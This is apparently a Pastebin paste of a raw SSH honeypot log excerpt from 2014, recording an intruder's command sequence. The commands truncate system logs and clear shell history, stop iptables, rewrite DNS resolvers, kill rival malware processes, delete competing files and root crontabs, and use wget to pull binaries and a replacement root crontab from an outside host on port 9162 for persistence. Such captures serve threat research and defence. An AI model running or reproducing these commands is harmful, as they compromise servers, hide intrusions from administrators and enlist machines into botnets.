  708. cd /var/log > kern.log
  709. cd /var/log > lastlog
  710. cd /var/log > maillog
  711. cd /var/log > user.log
  712. cd /var/log > Xorg.x.log
  713. cd /var/log > anaconda.log
  714. cd /var/log > yum.log
  715. cd /var/log > secure
  716. cd /var/log > wtmp
  717. cd /var/log > utmp
  718. cd /var/log > messages
  719. cd /var/log > spooler
  720. cd /var/log > sudolog
  721. cd /var/log > aculog
  722. cd /var/log > access-log
  723. cd /root > .bash_history
  724. history -c"
  725. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] CMD: /etc/init.d/iptables stop
  726. echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  727. echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  728. apt-get -y install wget
  729. yum -y install wget
  730. chmod 7777 / etc
  731. killall -9 .IptabLes
  732. killall -9 nfsd4
  733. killall -9 profild.key
  734. cd /etc;rm -rf dir fake.cfg
  735. killall -9 nfsd
  736. killall -9 DDosl
  737. killall -9 lengchao32
  738. killall -9 b26
  739. killall -9 khelper
  740. killall -9 Bill
  741. killall -9 n26
  742. killall -9 007
  743. killall -9 codelove
  744. killall -9 32
  745. killall -9 m32
  746. killall -9 m64
  747. killall -9 64
  748. killall -9 83BOT
  749. killall -9 82BOT
  750. killall -9 dos64
  751. killall -9 dos32
  752. killall -9 new6
  753. killall -9 new4
  754. killall -9 node24
  755. killall -9 mimi
  756. killall -9 nodeJR-1
  757. killall -9 freeBSD
  758. killall -9 ksapdd
  759. killall -9 106
  760. killall -9 09
  761. killall -9 xsw
  762. killall -9 syslogd
  763. killall -9 skysapdd
  764. killall -9 cupsddd
  765. killall -9 ksapd
  766. killall -9 atddd
  767. killall -9 xfsdxd
  768. killall -9 sfewfesfs
  769. killall -9 gfhjrtfyhuf
  770. killall -9 rewgtf3er4t
  771. killall -9 fdsfsfvff
  772. killall -9 smarvtd
  773. killall -9 whitptabil
  774. killall -9 gdmorpen
  775. cd /etc;chattr -i 66
  776. cd /root; chmod 7777 / etc
  777. killall -9 minerd
  778. killall -9 syn
  779. killall -9 joudckfr
  780. killall -9 www
  781. killall -9 log
  782. killall -9 .IptabLes
  783. killall -9 .IptabLex
  784. killall -9 .Mm2
  785. killall -9 acpid
  786. killall -9 m64
  787. killall -9 ./QQ
  788. killall -9 aabb
  789. killall -9 g3
  790. killall -9 S99local
  791. killall -9 3
  792. killall -9 pm
  793. killall -9 qweasd
  794. killall -9 tangtang
  795. killall -9 imap-login
  796. killall -9 xudp
  797. killall -9 sshpa
  798. killall -9 008
  799. killall -9 txma
  800. killall -9 mrdos64.b00
  801. killall -9 mrdos32.b00
  802. killall -9 kkpklp
  803. killall -9 kiilp
  804. killall -9 xin1
  805. killall -9 jibateng
  806. killall -9 syscore.sh
  807. killall -9 syscore.sh
  808. killall -9 syscore.sh
  809. killall -9 .mimeo
  810. killall -9 .mimeo
  811. killall -9 .mimeo
  812. killall -9 .mimeop
  813. killall -9 .task1
  814. killall -9 .mimeop
  815. killall -9 .IptabLes
  816. killall -9 .IptabLex
  817. killall -9 .IptabLes
  818. killall -9 .IptabLex
  819. killall -9 .IptabLes
  820. killall -9 .IptabLex
  821. killall -9 .IptabLes
  822. killall -9 .IptabLex
  823. cd /root;rm -rf dir nohup.out
  824. cd /etc;rm -rf dir fake.cfg
  825. cd /etc;rm -rf dir cupsddd.*
  826. cd /etc;rm -rf dir atddd.*
  827. cd /etc;rm -rf dir ksapdd.*
  828. cd /etc;rm -rf dir kysapdd.*
  829. cd /etc;rm -rf dir sksapdd.*
  830. cd /etc;rm -rf dir skysapdd.*
  831. cd /etc;rm -rf dir xfsdxd.*
  832. cd /etc;rm -rf dir fake.cfg
  833. cd /etc;rm -rf dir cupsdd.*
  834. cd /etc;rm -rf dir atdd.*
  835. cd /etc;rm -rf dir ksapd.*
  836. cd /etc;rm -rf dir kysapd.*
  837. cd /etc;rm -rf dir sksapd.*
  838. cd /etc;rm -rf dir skysapd.*
  839. cd /etc;rm -rf dir xfsdx.*
  840. cd /etc;rm -rf dir sfewfesfs
  841. cd /etc;rm -rf dir gfhjrtfyhuf
  842. cd /etc;rm -rf dir rewgtf3er4t
  843. cd /etc;rm -rf dir fdsfsfvff
  844. cd /etc;rm -rf dir smarvtd
  845. cd /etc;rm -rf dir whitptabil
  846. cd /etc;rm -rf dir gdmorpen
  847. cd /etc;rm -rf dir sfewfesfs.*
  848. cd /etc;rm -rf dir gfhjrtfyhuf.*
  849. cd /etc;rm -rf dir rewgtf3er4t.*
  850. cd /etc;rm -rf dir fdsfsfvff.*
  851. cd /etc;rm -rf dir smarvtd.*
  852. cd /etc;rm -rf dir whitptabil.*
  853. cd /etc;rm -rf dir gdmorpen.*
  854. cd /etc;rm -rf dir nhgbhhj.*
  855. cd /tmp;rm -rf dir 1.*
  856. cd /tmp;rm -rf dir 2.*
  857. cd /tmp;rm -rf dir 3.*
  858. cd /tmp;rm -rf dir 4.*
  859. cd /tmp;rm -rf dir 5.*
  860. cd /tmp;rm -rf dir jdhe
  861. cd /tmp;rm -rf dir jdhe.*
  862. cd /var/spool/cron; rm -rf dir root.*
  863. cd /var/spool/cron; rm -rf dir root
  864. cd /var/spool/cron/crontabs; rm -rf dir root.*
  865. cd /var/spool/cron/crontabs; rm -rf dir root
  866. cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  867. cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  868. yes|mv /tmp/root /var/spool/cron
  869. yes|mv /tmp/root /var/spool/cron/crontabs
  870. cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  871. cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  872. cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  873. cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  874. cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  875. cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  876. cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  877. cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  878. cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!